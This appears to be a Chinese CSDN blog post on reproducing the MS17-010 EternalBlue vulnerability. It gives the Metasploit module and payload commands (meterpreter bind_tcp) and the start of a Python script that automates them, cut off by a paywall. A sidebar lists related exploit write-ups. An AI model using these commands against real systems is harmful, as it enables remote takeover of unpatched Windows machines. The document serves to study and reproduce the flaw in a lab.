记录一次 先手工 再python脚本 验证永恒之蓝ms17-10漏洞

最新推荐文章于 2024-06-21 15:54:14 发布
最新推荐文章于 2024-06-21 15:54:14 发布
阅读量4.7k 收藏 12
点赞数 2
文章标签: python metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42214273/article/details/83177314
版权
本文记录了一次手工配合Python脚本验证MS17-010永恒之蓝漏洞的过程。首先,通过Metasploit框架,设置payload并指定目标与本地主机,然后执行exploit。接着,使用Python的sys和os模块对靶机进行445端口扫描,确保服务开启。最后,通过Python脚本实现自动化验证,成功获取靶机控制权。
摘要由CSDN通过智能技术生成

查看资料 ms17-10漏洞利用的步骤大致如下

打开msf

use auxiliary/scanner/smb/smb_ms17_010

msf exploit(ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp

msf exploit(ms17_010_eternalblue) > set RHOST *******************

msf exploit(ms17_010_eternalblue) > set LHOST *******************

msf exploit(ms17_010_eternalblue) > exploit

尝试用python脚本 

使用sys 和os 模块

import sys

import os

print 'Metasploit executing the ms-17-010 vulnerability attack'#这句话的意思是正在实施MS17010漏洞的攻击

def sds(config):

    config=open('yhzl.rc','w')#首先我们来创建一个xxx

最低0.47元/天 解锁文章
Wh1te-小白
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
永恒之蓝漏洞攻击完整步骤
G_Fu_Q的博客
11-07 9098
kali攻击机 windows2003/windows2008被攻击机 ip:192.168.15.129 1.进行端口扫描 nmap -Pn -sV -T4 ip地址 明白445端口和3389端口open,3389关闭现在无所谓,如果开启以后拿到权限以后就不用做开启3389端口的操作 2.漏洞脚本检测 nmap --script=vuln 192.168.15.129(ip地址) 看出ms17-010漏洞可以攻击 3.msfconsole测试 msfconsole 4.
Python脚本Metasploit交互进行自动永恒之蓝攻击
墨鱼菜鸡
11-12 98
我们首利用findTarget()函数找到目标网段或目标主机中开放了445端口的主机,然后利用confickerExploit()函数将攻击代码写入configure.rc 配置文件中,最后调用 MSF框架读取配置文件进行攻击! # -*- coding: utf-8 -*- """ Cre...
MS17-010(Eternal blue永恒之蓝漏洞利用+修复方法
最新发布
记录学习
06-21 2803
msf永恒之蓝漏洞复现过程以及修复建议
MS17-010永恒之蓝验证
weixin_30315905的博客
12-21 267
一、安装MSF,windows下安装也可以,直接安装kali也可以,我是kali是攻击主机,win7是靶机,都在虚拟机里。 1、windows下安装MSF请参考:http://blog.csdn.net/wangsy0202/article/details/51914748(https://www.metasploit.com/官网下载) 2、kali的安装请直接去官网下载:https://w...
Python-用python编写的MS17010多线程扫描器
08-10
python编写的MS17-010多线程扫描器
网络攻防之-针对ms17-010脚本python
12-23
永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,...
高效Ambari部署Python3脚本资源 - umx-deploy-script
03-25
项目概述:本项目名为umx-deploy-script,旨在提供一种高效的Ambari部署方式,专门为Python 3环境设计。包含62个文件,主要采用Python语言编写,并辅以Shell脚本,以实现灵活的自动化部署流程。 文件组成: - ...
python 打包后win7丢失api-ms-win-core-path无法启动
03-17
标题 "python 打包后win7丢失api-ms-win-core-path无法启动" 描述了一个常见的问题,即使用Python打包工具(如PyInstaller)生成的可执行文件在Windows 7系统上运行时,可能会遇到“api-ms-win-core-path”缺失的...
dnspod-python:自动更新DNSPOD域名A记录脚本,基于dnspod-python-api
05-20
上填写的A域名记录指定的IP字段。 ##使用: 首,注册登录 填写相关域名信息。 填写dnspod.conf配置文件中相关信息,email,password及domain_name是必须的(域名如有多个请使用英文的,分隔)。 利用crontab实现...
python打包程序win7 win10下运行丢失api-ms-win-crt-runtime-l1-1-0.dll的解决方法
08-29
标题中的问题涉及到的是Python程序在不同Windows系统之间运行兼容性的问题,特别是当使用pyinstaller进行打包后,在Win7系统上运行时出现“计算机丢失api-ms-win-crt-runtime-l1-1-0.dll”的错误。这个问题的根源...
cve-2018-4878漏洞python脚本下载
10-30
cve-2018-4878漏洞python脚本下载
Python脚本实现Web漏洞扫描工具
09-21
### Python脚本实现Web漏洞扫描工具 #### 一、项目背景与目的 本文介绍的是一个由作者在毕业设计阶段开发的Web漏洞扫描工具。该工具主要用于检测常见的Web应用安全漏洞,如SQL注入漏洞、SQL盲注漏洞以及跨站脚本...
WordPress Plugin - WPdiscuz 7.0.4 任意文件上传漏洞和poc,python脚本,复现所需软件安装
01-01
WordPress Plugin - WPdiscuz 7.0.4 任意文件上传漏洞和poc,python脚本,复现所需软件安装包wordpress-5.4.1-zh_CN.tar.gz,phpStudy_64_v8.1.1.3.zip,phpStudy-1_v8.1.0.3.zip,wpdiscuz.7.0.4-1670423032410.zip
漏洞验证脚本ssl-deacth-alert(cve-2016-8610)
12-14
仅供学习。勿用商业。谢谢合作。漏洞验证脚本ssl-deacth-alert(cve-2016-8610)
obs-python-api-playground:用于Open Broadcaster软件(OBS)的各种python脚本
02-16
LX的OBS脚本游乐场 Open Broadcaster软件(OBS)的脚本集合。 免责声明 这里发布的所有脚本都是为一个人(我)和一个目的(我自己的享受)编写的。 不能保证这些脚本中的任何一个都会在您的独特情况下起作用(或就此...
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
热门推荐
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这篇基础性文章对您有所帮助。
python调用msfconsole全自动永恒之蓝攻击_MSF之MS17-010永恒之蓝漏洞利用
weixin_36190719的博客
01-14 583
Loading...请注意,本文编写于 392 天前,最后修改于 116 天前,其中某些信息可能已经过时。# MSF之MS17-010永恒之蓝漏洞利用1. 准备阶段2. 扫描漏洞3. 漏洞攻击---## 准备阶段**实验准备环境:**攻击机:虚拟机kali系统IP:192.168.207.130被攻击机:虚拟机Win7x64系统IP:10.101.2.11(关闭了防火墙)攻击工具:kali自带Ms...
[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
Python实现MS17-010漏洞利用脚本解析
在网络安全领域,MS17-010漏洞,也被称为永恒之蓝,是一个严重的问题,它源于美国国家安全局(NSA)泄露的工具包。这个漏洞主要影响的是微软的Server Message Block (SMB) 协议,特别是SMBv1和NetBIOS over TCP/IP ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值